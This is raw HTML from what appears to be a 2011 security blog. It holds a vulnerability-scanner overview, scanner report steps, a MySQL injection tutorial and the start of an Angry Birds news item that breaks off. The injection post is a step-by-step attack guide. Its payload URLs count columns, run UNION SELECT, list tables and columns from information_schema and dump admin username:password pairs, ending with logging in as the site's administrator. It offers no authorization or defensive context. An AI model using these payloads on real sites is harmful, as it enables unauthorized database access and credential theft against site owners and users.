<span><br /><!--[endif]--></span></div>
<div class="MsoNormal">
The scan starts:</div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiP204piD-lklZD-TYDGAe9lvm0VN1AEcER3hpRCeM-B8OFjOC4nGHMpNf0Iv9K0DP1N0tgoFjeCuzbJxGvS_GYQ5z-sbqyadqwTnZuzKKfVl_yjikdhOqwKMd__FCPWU2jOaiyHHX8XbU/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="76" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiP204piD-lklZD-TYDGAe9lvm0VN1AEcER3hpRCeM-B8OFjOC4nGHMpNf0Iv9K0DP1N0tgoFjeCuzbJxGvS_GYQ5z-sbqyadqwTnZuzKKfVl_yjikdhOqwKMd__FCPWU2jOaiyHHX8XbU/s640/6.png" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span><!--[if gte vml 1]><v:shape
id="Picture_x0020_25" o:spid="_x0000_i1027" type="#_x0000_t75" style='width:498pt;
height:58.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="file:///C:\Users\sudhir\AppData\Local\Temp\msohtmlclip1\01\clip_image013.png"
o:title=""/>
</v:shape><![endif]--><!--[if !vml]--><!--[endif]--></span></div>
<div class="MsoNormal">
After the scan is completed click on the “Reports” button. </div>
<div class="MsoNormal">
Double click on the scan result.(here it is “test123” in the
below image) <span><!--[if gte vml 1]><v:shape id="Picture_x0020_31"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:468pt;height:65.25pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="file:///C:\Users\sudhir\AppData\Local\Temp\msohtmlclip1\01\clip_image015.png"
o:title=""/>
</v:shape><![endif]--><!--[if !vml]--><!--[endif]--></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSAm9CdrzbqlM8Me-TWRdEks_R7IGxXsUmACXHtCG-SSDN22POJxQcV7vmnIwPfKaKyTsU0nxl6miNQeIG0tIZCCpsZmSGFwo0LOuL9LTD1OcOpxl2tBzZSXRjluF1wbHEEZWRFaIFqjE/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="92" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSAm9CdrzbqlM8Me-TWRdEks_R7IGxXsUmACXHtCG-SSDN22POJxQcV7vmnIwPfKaKyTsU0nxl6miNQeIG0tIZCCpsZmSGFwo0LOuL9LTD1OcOpxl2tBzZSXRjluF1wbHEEZWRFaIFqjE/s640/7.png" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Then you will get this page: <span> </span>The click on the “Download reports” button. <span><!--[if gte vml 1]><v:shape id="Picture_x0020_37"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:468pt;height:150pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="file:///C:\Users\sudhir\AppData\Local\Temp\msohtmlclip1\01\clip_image017.png"
o:title=""/>
</v:shape><![endif]--><!--[if !vml]--><!--[endif]--></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAXSVqIfqnlSn0NhpqpPN4p9SVZhpQ8YUdsvXxJZi2vyuy0UE1REuSy44FcFLhdtrH98PXJmyOUsr0xtnLrKu_7lQUGhzTaPwLyw8qWKuRv7g7KbBIIyeOzcJ0oYv1lyUYnRwbEo0VMY4/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="206" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAXSVqIfqnlSn0NhpqpPN4p9SVZhpQ8YUdsvXxJZi2vyuy0UE1REuSy44FcFLhdtrH98PXJmyOUsr0xtnLrKu_7lQUGhzTaPwLyw8qWKuRv7g7KbBIIyeOzcJ0oYv1lyUYnRwbEo0VMY4/s640/8.png" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Select the extension of download report as .rtf or html.</div>
<div class="MsoNormal">
**<b>This is just the
basic default scan.</b></div>
<div class="MsoNormal">
<br /></div>
</div>sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.com0tag:blogger.com,1999:blog-7651709861170417818.post-54311685335123512602011-10-14T23:04:00.000-07:002011-10-14T23:09:20.063-07:00SCANNING<p class="MsoNormal"></p><p class="MsoNormal">A <b>vulnerability scanner</b> is a computer program designed to assess computers, computer systems, networks or applications for weaknesses. There are a number of types of vulnerability scanners available today, distinguished from one another by a focus on particular targets. While functionality varies between different types of vulnerability scanners, they share a common, core purpose of enumerating the vulnerabilities present in one or more targets.</p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal" style="mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; line-height:normal;mso-outline-level:2"><b><u><span style="font-size:18.0pt; font-family:"Times New Roman","serif";mso-fareast-font-family:"Times New Roman"">Types of Vulnerability Scanners<o:p></o:p></span></u></b></p> <p class="MsoNormal" style="margin-bottom:0in;margin-bottom:.0001pt;line-height: normal"><span style="font-size:12.0pt;font-family:Symbol;mso-ascii-font-family: "Times New Roman";mso-fareast-font-family:"Times New Roman";mso-bidi-font-family: "Times New Roman"">·</span><span style="font-size:12.0pt;font-family:"Times New Roman","serif"; mso-fareast-font-family:"Times New Roman""><span> </span>Port scanner <o:p></o:p></span></p> <p class="MsoNormal" style="margin-bottom:0in;margin-bottom:.0001pt;line-height: normal"><span style="font-size:12.0pt;font-family:"Times New Roman","serif"; mso-fareast-font-family:"Times New Roman""><o:p> </o:p></span><span style="font-size:12.0pt;font-family:Symbol;mso-ascii-font-family: "Times New Roman";mso-fareast-font-family:"Times New Roman";mso-bidi-font-family: "Times New Roman"">·</span><span style="font-size:12.0pt;font-family:"Times New Roman","serif"; mso-fareast-font-family:"Times New Roman""><span> </span>Network vulnerability scanner</span></p> <p class="MsoNormal" style="mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; line-height:normal;mso-outline-level:2"><span style="font-size:12.0pt; font-family:Symbol;mso-ascii-font-family:"Times New Roman";mso-fareast-font-family: "Times New Roman";mso-bidi-font-family:"Times New Roman"">·</span><span style="font-size:12.0pt;font-family:"Times New Roman","serif";mso-fareast-font-family: "Times New Roman""><span> </span>Web application security scanner</span><b><u><span><o:p></o:p></span></u></b></p> <p class="MsoNormal">We have different tools for this kind of scanning methodologies.To scan for open ports we use mostly the tool called <b>NMAP </b>or Superscan <span> </span>etc.</p> <p class="MsoNormal">For Network security assessment we use tools like <b>GFI Languard</b> , <b>Retina</b> scanner or <b>NESSUS</b>.Mostly organisations use NESSUS as it give vast variety of scan techniques and gives the exact vuln and kind of patching solution , as goes same for GFI but GFI surpasses <b>Nessus</b> when targeting Windows hosts.Nessus works on and against different platforms.</p> <p class="MsoNormal">The tools used for Web app scanning are <b>ACUNETIX </b>, <b>IBM AppScan </b>or <b>WebInspect </b>etc. As we have many tools for Webapp security testing .Acunetix and IBM are mostly used.</p> <p class="MsoNormal">-----------------------------------------------------------------------------------------------------------------------------</p> <p class="MsoNormal">[* I will be posting the tutorials for all tools Mentioned above , Which will be updated Shrortly.*]</p><p></p>sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.com0tag:blogger.com,1999:blog-7651709861170417818.post-45863968592892371542011-09-25T23:19:00.000-07:002011-10-20T09:46:39.872-07:00MySQL Injection<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-size: 130%;"><span style="color: black; font-family: 'Courier New'; font-size: 10pt; font-weight: bold;">MYSQL injection</span></span><b><span style="color: black; font-family: 'Courier New'; font-size: 10pt;"><br /></span></b></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<b><span style="color: black; font-family: 'Courier New'; font-size: 10pt;"><br /></span></b></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<b><span style="color: black; font-family: 'Courier New'; font-size: 10pt;">Check for vulnerability:</span></b></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<b><span style="color: black; font-family: 'Courier New'; font-size: 10pt;">------------------------</span></b></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">Let's say that we have some site like this</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">http://www.site.com/news.php?id=5</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">Now to test if is vulrnable we add to the end of url ' (quote),</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">and that would be http://www.site.com/news.php?id=5'</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">so if we get some error like</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">or something similar</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">that means is vulrnable to sql injection :)</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<b><span style="color: black; font-family: 'Courier New'; font-size: 10pt;">Find the number of columns:</span></b></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<b><span style="color: black; font-family: 'Courier New'; font-size: 10pt;">----------------------------</span></b></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">To find number of columns we use statement ORDER BY (tells database how to order the result)</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">so how to use it? Well just incrementing the number until we get an error.</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">http://www.site.com/news.php?id=5 order by 1/* <-- no error</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">http://www.site.com/news.php?id=5 order by 2/* <-- no error</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">http://www.site.com/news.php?id=5 order by 3/* <-- no error</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">http://www.site.com/news.php?id=5 order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">that means that the it has 3 columns, cause we got an error on 4.</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<b><span style="color: black; font-family: 'Courier New'; font-size: 10pt;">Check for UNION function:</span></b></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<b><span style="color: black; font-family: 'Courier New'; font-size: 10pt;">-------------------------</span></b></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">With union we can select more data in one sql statement.</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">so we have</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">http://www.site.com/news.php?id=5 union all select 1,2,3/* </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">NOTE: if /* not working or you get some error, then try --</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">it's a comment and it's important for our query to work properly.</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">(we already found that number of columns are 3 in section 2). )</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works :)</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<b><span style="color: black; font-family: 'Courier New'; font-size: 10pt;">Check for MySQL version:</span></b></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<b><span style="color: black; font-family: 'Courier New'; font-size: 10pt;">------------------------</span></b></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">http://www.site.com/news.php?id=5 union all select 1,2,3,4/* </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">let say that we have number 4 on the screen, now to check for version</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">we replace the number 4 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">The version should be greater than 5 , if its less than 5 you should guess the table name.</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<b><span style="color: black; font-family: 'Courier New'; font-size: 10pt;">Getting table and column name:</span></b></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<b><span style="color: black; font-family: 'Courier New'; font-size: 10pt;">-------------------------------</span></b></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<b><span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></b></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">http://www.site.com/news.php?id=5 union all select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">we get table names.check for table name admin of some login user.</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">now to check column names.</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">To check the columns replace the word “table” with column</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">http://www.site.com/news.php?id=5 union all select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=hex_value</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">note: the table should be in hex value.(this works mostly)</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">we get columns displayed on screen, userid, passwd etc...</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">now to retrieve values use:</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">now we get dislayed username:password on screen, i.e admin:admin or admin:somehash</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">when you have this, you can login like admin or some superuser :D</span></div>
</div>sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.com0tag:blogger.com,1999:blog-7651709861170417818.post-52014728375496465712011-09-15T00:08:00.000-07:002011-09-15T00:17:34.562-07:00Angry Birds Costing Businesses $1.5 Billion In Lost WagesThe world's love of <span style="font-weight: bold;">Angry Birds</span> could be costing businesses over $1.5 billion in lost wages, according to an estimate from Alexis Madrigal of the Atlantic.<p class="MsoNormal" style="line-height: normal;"><!--[if gte mso 9]><xml> <w:worddocument> <w:view>Normal</w:View> <w:zoom>0</w:Zoom> <w:trackmoves/> <w:trackformatting/> <w:punctuationkerning/> <w:validateagainstschemas/> <w:saveifxmlinvalid>false</w:SaveIfXMLInvalid> <w:ignoremixedcontent>false</w:IgnoreMixedContent> <w:alwaysshowplaceholdertext>false</w:AlwaysShowPlaceholderText> <w:donotpromoteqf/> <w:lidthemeother>EN-US</w:LidThemeOther> <w:lidthemeasian>X-NONE</w:LidThemeAsian> <w:lidthemecomplexscript>X-NONE</w:LidThemeComplexScript> <w:compatibility> <w:breakwrappedtables/> <w:snaptogridincell/> <w:wraptextwithpunct/> <w:useasianbreakrules/> <w:dontgrowautofit/> <w:splitpgbreakandparamark/> <w:dontvertaligncellwithsp/> <w:dontbreakconstrainedforcedtables/> <w:dontvertalignintxbx/> <w:word11kerningpairs/> <w:cachedcolbalance/> </w:Compatibility> <w:browserlevel>MicrosoftInternetExplorer4</w:BrowserLevel> <m:mathpr> <m:mathfont val="Cambria Math"> <m:brkbin val="before"> <m:brkbinsub val="--"> <m:smallfrac val="off"> <m:dispdef/> <m:lmargin val="0"> <m:rmargin val="0"> <m:defjc val="centerGroup"> <m:wrapindent val="1440"> <m:intlim val="subSup"> <m:narylim val="undOvr"> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:latentstyles deflockedstate="false" defunhidewhenused="true" defsemihidden="true" defqformat="false" defpriority="99" latentstylecount="267"> <w:lsdexception locked="false" priority="0" semihidden="false" unhidewhenused="false" qformat="true" name="Normal"> <w:lsdexception locked="false" priority="9" semihidden="false" unhidewhenused="false" qformat="true" name="heading 1"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 2"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 3"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 4"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 5"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 6"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 7"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 8"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 9"> <w:lsdexception locked="false" priority="39" name="toc 1"> <w:lsdexception locked="false" priority="39" name="toc 2"> <w:lsdexception locked="false" priority="39" name="toc 3"> <w:lsdexception locked="false" priority="39" name="toc 4"> <w:lsdexception locked="false" priority="39" name="toc 5"> <w:lsdexception locked="false" priority="39" name="toc 6"> <w:lsdexception locked="false" priority="39" name="toc 7"> <w:lsdexception locked="false" priority="39" name="toc 8"> <w:lsdexception locked="false" priority="39" name="toc 9"> <w:lsdexception locked="false" priority="35" qformat="true" name="caption"> <w:lsdexception locked="false" priority="10" semihidden="false" unhidewhenused="false" qformat="true" name="Title"> <w:lsdexception locked="false" priority="1" name="Default Paragraph Font"> <w:lsdexception locked="false" priority="11" semihidden="false" unhidewhenused="false" qformat="true" name="Subtitle"> <w:lsdexception locked="false" priority="22" semihidden="false" unhidewhenused="false" qformat="true" name="Strong"> <w:lsdexception locked="false" priority="20" semihidden="false" unhidewhenused="false" qformat="true" name="Emphasis"> <w:lsdexception locked="false" priority="59" semihidden="false" unhidewhenused="false" name="Table Grid"> <w:lsdexception locked="false" unhidewhenused="false" name="Placeholder Text"> <w:lsdexception locked="false" priority="1" semihidden="false" unhidewhenused="false" qformat="true" name="No Spacing"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 1"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 1"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 1"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 1"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 1"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 1"> <w:lsdexception locked="false" unhidewhenused="false" name="Revision"> <w:lsdexception locked="false" priority="34" semihidden="false" unhidewhenused="false" qformat="true" name="List Paragraph"> <w:lsdexception locked="false" priority="29" semihidden="false" unhidewhenused="false" qformat="true" name="Quote"> <w:lsdexception locked="false" priority="30" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Quote"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 1"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 1"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 1"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 1"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 1"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 1"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful 